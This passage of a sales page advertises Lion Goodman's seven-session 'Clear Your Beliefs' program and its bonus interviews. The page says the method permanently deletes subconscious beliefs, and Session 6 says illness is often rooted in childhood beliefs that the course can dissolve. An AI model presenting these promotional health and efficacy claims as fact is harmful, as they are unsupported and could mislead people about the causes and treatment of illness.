change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as 